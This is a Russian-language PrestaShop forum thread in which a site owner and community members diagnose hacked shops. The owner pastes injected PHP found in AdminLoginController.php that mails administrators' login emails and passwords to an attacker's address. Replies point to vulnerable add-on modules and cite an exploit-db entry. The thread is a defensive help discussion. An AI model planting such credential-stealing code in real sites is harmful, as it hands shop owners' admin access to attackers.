Автор Тема: Взломан сайт на prestashop  (Прочитано 316 раз)

16 Июля 2016, 16:46:46
  • Фрилансер
  • *
  • Сообщений: 235
  • Репутация: +2/-0
    • Просмотр профиля
Коллеги, кто сталкивался со взломом сайта на prestashop?
У меня несколько сайтов на разных хостингах. Проблема со взомом за последний месяц на всех сайтах. От чего делаю вывод, что хостинг не виноват. В prestashop проблема. Может кто знает как защиться от взлома?
16 Июля 2016, 16:55:05
Ответ #1
  • Ветеран
  • *****
  • Сообщений: 2167
  • Репутация: +49/-4
  • Сообщество PrestaShop
    • Просмотр профиля
С чего решил что сайты взломаны?
Свой комп проверь, может тебя взломали?
16 Июля 2016, 17:07:34
Ответ #2
  • Фрилансер
  • *
  • Сообщений: 235
  • Репутация: +2/-0
    • Просмотр профиля
В google предупреждение, что сайт угражает безопасности. У себя я в первую очередь все проверил.
На один сайт вообще пол-года незаходил, забросил его давно. Так и он взломан.
17 Июля 2016, 11:02:46
Ответ #3
  • Модератор
  • Ветеран
  • *****
  • Сообщений: 85948
  • Репутация: +25399/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Проверьте файл /controllers/admin/AdminLoginController.php.
17 Июля 2016, 12:19:20
Ответ #4
  • Фрилансер
  • *
  • Сообщений: 235
  • Репутация: +2/-0
    • Просмотр профиля
Проверьте файл /controllers/admin/AdminLoginController.php.
Проверил. Там какой-то код
$to = "hooligans3assima@gmail.com";
$subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
$header = "from: hacked <bajatax@hacked.com>";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);
Я так понимаю все мои пароли уже знают?
17 Июля 2016, 12:29:09
Ответ #5
  • Ветеран
  • *****
  • Сообщений: 2167
  • Репутация: +49/-4
  • Сообщество PrestaShop
    • Просмотр профиля
Я так понимаю все мои пароли уже знают?
Правильно понимешь  :)
Меняй пароли. Нужно все проверить, неизвестно что еще тебе там оставили
17 Июля 2016, 13:01:10
Ответ #6
  • Фрилансер
  • *
  • Сообщений: 235
  • Репутация: +2/-0
    • Просмотр профиля
Я так понимаю все мои пароли уже знают?
Правильно понимешь  :)
Меняй пароли. Нужно все проверить, неизвестно что еще тебе там оставили
Спасибо, обрадовал.
А почему так произошло? Это баг в безопасности prestashop?
17 Июля 2016, 14:04:37
Ответ #7
  • Ветеран
  • *****
  • Сообщений: 2167
  • Репутация: +49/-4
  • Сообщество PrestaShop
    • Просмотр профиля
Не за что, обращайся еще  :)
С prestashop были поблемки, но про AdminLoginController.php еще не слышал.
Логи смотртеть нужно, когда, кто, что менял и т.д.
17 Июля 2016, 19:18:16
Ответ #8
  • Ветеран
  • *****
  • Сообщений: 13139
  • Репутация: +14553/-0
  • Сообщество PrestaShop
    • Просмотр профиля
А почему так произошло? Это баг в безопасности prestashop?
Не в движке проблема, в модулях.
У вас доп. модули установлены? Такие модули как revsliderprestashop, дают возможность взломать ваш сайт. Нужно регулярно обновлять, следить за обнаружением уязвимостей. Так совсем недавно была тема по revsliderprestashop, там писали
Критические замечания по модулю revsliderprestashop
Уязвимости в скриптах (1)
/public_html/modules/revsliderprestashop/inc_php/framework/image_view.class.php - AFU : REVSLIDER : http://www.exploit-db.com/exploits/35385/
17 Июля 2016, 19:19:45
Ответ #9
  • Фрилансер
  • *
  • Сообщений: 235
  • Репутация: +2/-0
    • Просмотр профиля
Adik, я не понял, что с этим делать? Можете подробнее объяснить?
22 Июля 2016, 12:54:33
Ответ #10
  • Ветеран
  • *****
  • Сообщений: 32991
  • Репутация: +26759/-0
    • Просмотр профиля